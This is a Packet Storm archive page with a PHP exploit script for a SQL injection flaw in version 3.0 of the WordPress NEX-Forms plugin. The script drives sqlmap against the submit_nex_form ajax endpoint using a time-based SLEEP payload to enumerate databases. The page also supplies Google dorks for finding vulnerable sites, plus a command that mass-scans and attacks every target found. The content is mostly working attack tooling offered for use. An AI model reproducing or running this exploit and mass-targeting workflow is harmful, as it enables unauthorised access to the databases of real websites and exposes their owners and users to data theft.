Twenty Year Anniversary

WordPress NEX-Forms 3.0 SQL Injection

WordPress NEX-Forms 3.0 SQL Injection
Posted Apr 21, 2015
Authored by Cleiton Pinheiro

WordPress NEX-Forms plugin version 3.0 remote SQL injection exploit.

tags | exploit, remote, sql injection
MD5 | 5347cbce32457ac598271ddb58cb21b5

WordPress NEX-Forms 3.0 SQL Injection

Change Mirror Download
  # AUTOR SCRIPT:  Cleiton Pinheiro / Nick: googleINURL
# Exploit name: MINI 3xplo1t-SqlMap - WordPress NEX-Forms 3.0 SQL
Injection Vulnerability
# Type: SQL Injection
# Email: inurlbr@gmail.com
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS: http://google.com/+INURLBrasil
# Who Discovered
http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli
# Vulnerability discovered by: Claudio Viviani



# VENTOR
https://wordpress.org/plugins/nex-forms-express-wp-form-builder/

# Vulnerability Description
The "submit_nex_form" ajax function is affected from SQL Injection
vulnerability

# Tool Description
Automation script explores targets with the help of SqlMap tool Execute
command SqlMap

{$params['folder']} -u
'{$params['target']}/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1'
--technique=B -p nex_forms_Id --dbms mysql {$params['proxy']}
--random-agent
--answers='follow=N' --dbs --batch --time-sec 10 --level 2 --risk 1

# GET VULN
SQL can be injected in the following GET

GET VULN: nex_forms_Id=(id)
$nex_forms_Id=intval($_REQUEST['nex_forms_Id'])
Ex:
http://target.us/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1

# XPL inject DBMS: 'MySQL'

Exploit: AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)
- GOOGLE DORK

inurl:nex-forms-express-wp-form-builder
index of nex-forms-express-wp-form-builde
# COMMAND --help:

-t : SET TARGET.
-f : SET FILE TARGETS.
-p : SET PROXY
Execute:
php wp3xplo1t.php -t target
php wp3xplo1t.php -f targets.txt
php wp3xplo1t.php -t target -p 'http://localhost:9090'

# EXPLOIT MASS USE SCANNER INURLBR

./inurlbr.php --dork 'inurl:nex-forms-express-wp-form-builder' -s
wp3xplo1t.txt -q 1,6 --comand-vul "php wp3xplo1t.php -t '_TARGET_'"
# DOWNLOAD INURLBR

https://github.com/googleinurl/SCANNER-INURLBR

# REFERENCE
[1] http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli

EXPLOIT CODE:

<?php

/*
[ I N U R L - B R A S I L ] - [ By GoogleINURL ]

-----------------------------------------------------------------------------

# AUTOR SCRIPT: Cleiton Pinheiro / Nick: googleINURL
# Email: inurlbr@gmail.com
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS: http://google.com/+INURLBrasil

# Who Discovered
http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli
# Vulnerability discovered by: Claudio Viviani

-----------------------------------------------------------------------------

# EXPLOIT NAME: MINI exploit-SQLMAP - WordPress NEX-Forms 3.0 SQL
Injection Vulnerability / INURL BRASIL
# VENTOR:
https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
# Dork Google: inurl:nex-forms-express-wp-form-builder
# Dork Google: index of nex-forms-express-wp-form-builde
# GET VULN: nex_forms_Id=(id)
# $nex_forms_Id=intval($_REQUEST['nex_forms_Id'])

-----------------------------------------------------------------------------

# DBMS: 'MySQL'
# Exploit: AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)


-----------------------------------------------------------------------------

# Info: The "submit_nex_form" ajax function is affected from SQL
Injection vulnerability
# POC:
http://target.us/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=(id)+Exploit

-----------------------------------------------------------------------------

# --help:
-t : SET TARGET.
-f : SET FILE TARGETS.
-p : SET PROXY
Execute:
php wp3xplo1t.php -t target
php wp3xplo1t.php -f targets.txt
php wp3xplo1t.php -t target -p 'http://localhost:9090'

-----------------------------------------------------------------------------

# EXPLOIT MASS USE SCANNER INURLBR
# COMMAND: ./inurlbr.php --dork 'inurl:nex-forms-express-wp-form-builder'
-s wp3xplo1t.txt -q 1,6 --comand-vul "php wp3xplo1t.php -t '_TARGET_'"
# DOWNLOAD INURLBR: https://github.com/googleinurl/SCANNER-INURLBR

-----------------------------------------------------------------------------
INFO:
http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli/
*/


error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
$folder_SqlMap = "sqlmap"; // set the folder! ex: python
../../sqlmap/sqlmap.py
$op_ = getopt('f:t:p:', array('help::'));
echo "
\t\t\t\t _____
\t\t\t\t (_____) ____ _ _ _ _ _____ _ ____
_ _
\t\t\t\t (() ()) |_ _| \ | | | | | __ \| | | _ \
(_) |
\t\t\t\t \ / | | | \| | | | | |__) | | ______ | |_) |_ __
__ _ ___ _| |
\t\t\t\t \ / | | | . ` | | | | _ /| | |______| | _ <| '__/
_` / __| | |
\t\t\t\t /=\ _| |_| |\ | |__| | | \ \| |____ | |_) | | |
(_| \__ \ | |
\t\t\t\t [___] |_____|_| \_|\____/|_| \_\______| |____/|_|
\__,_|___/_|_|
\t\t\t\t\033[1;37m0xNeither war between hackers, nor peace for the system.\n
\t\t\t\t[+] [Exploit]: MINI 3xplo1t-SqlMap - WordPress NEX-Forms 3.0 SQL
Injection Vulnerability / INURL BRASIL\n\t\t\t\t[+] [help]:
--help\033[0m\n\n";
$menu = "
\t\t\t\t -t : SET TARGET.
\t\t\t\t -f : SET FILE TARGETS.
\t\t\t\t -p : SET PROXY
\t\t\t\t Execute:
\t\t\t\t php wp3xplo1t.php -t target
\t\t\t\t php wp3xplo1t.php -f targets.txt
\t\t\t\t php wp3xplo1t.php -t target -p '
http://localhost:9090'
\n";
echo isset($op_['help']) ? exit($menu) : NULL;

$params = array(
'target' => not_isnull_empty($op_['t']) ? (strstr($op_['t'], 'http') ?
$op_['t'] : "http://{$op_['t']}") : NULL,
'file' => !not_isnull_empty($op_['t']) && not_isnull_empty($op_['f']) ?
$op_['f'] : NULL,
'proxy' => not_isnull_empty($op_['p']) ? "--proxy '{$op_['p']}'" : NULL,
'folder' => $folder_SqlMap,
'line' =>
"\t\t\t\t--------------------------------------------------------------------------------------------------------"
);

not_isnull_empty($params['target']) && not_isnull_empty($params['file']) ?
exit("\t\t\t\t[X] [ERRO] DEFINE TARGET OR FILE TARGET\n") : NULL;
not_isnull_empty($params['target']) ? __exec($params) . exit() : NULL;
not_isnull_empty($params['file']) ? __listTarget($params) . exit() : NULL;

function not_isnull_empty($valor = NULL) {
RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE;
}

function __plus() {
ob_flush();
flush();
}

function __listTarget($file) {
$tgt_ = array_unique(array_filter(explode("\n",
file_get_contents($file['file']))));
echo "\n\033[1;37m[!] [" . date("H:i:s") . "] [INFO] TOTAL TARGETS
LOADED : " . count($tgt_) . "\033[0m\n";
foreach ($tgt_ as $url) {
echo "\033[1;37m[+] [" . date("H:i:s") . "] [INFO] SCANNING :
{$url} \033[0m\n";
__plus();
$file['target'] = $url;
__exec($file) . __plus();
}
}

function __exec($params) {
__plus();
echo "\033[1;37m{$params['line']}\n[!] [" . date("H:i:s") . "] [INFO]
starting SqlMap...\n";
echo "[+] [" . date("H:i:s") . "] [INFO] TARGET:
{$params['target']}/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id={SQL-INJECTION}\033[0m\n";
$command = "{$params['folder']} -u
'{$params['target']}/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1'
"
. " -p nex_forms_Id --dbms mysql {$params['proxy']}
--random-agent "
. " --answers='follow=N' --dbs --batch --time-sec 10 --level 2
--risk 1";
system($command, $dados);
__plus();
exit(0);
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    26 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    2 Files
  • 7
    Oct 7th
    3 Files
  • 8
    Oct 8th
    23 Files
  • 9
    Oct 9th
    16 Files
  • 10
    Oct 10th
    15 Files
  • 11
    Oct 11th
    19 Files
  • 12
    Oct 12th
    16 Files
  • 13
    Oct 13th
    2 Files
  • 14
    Oct 14th
    2 Files
  • 15
    Oct 15th
    15 Files
  • 16
    Oct 16th
    20 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close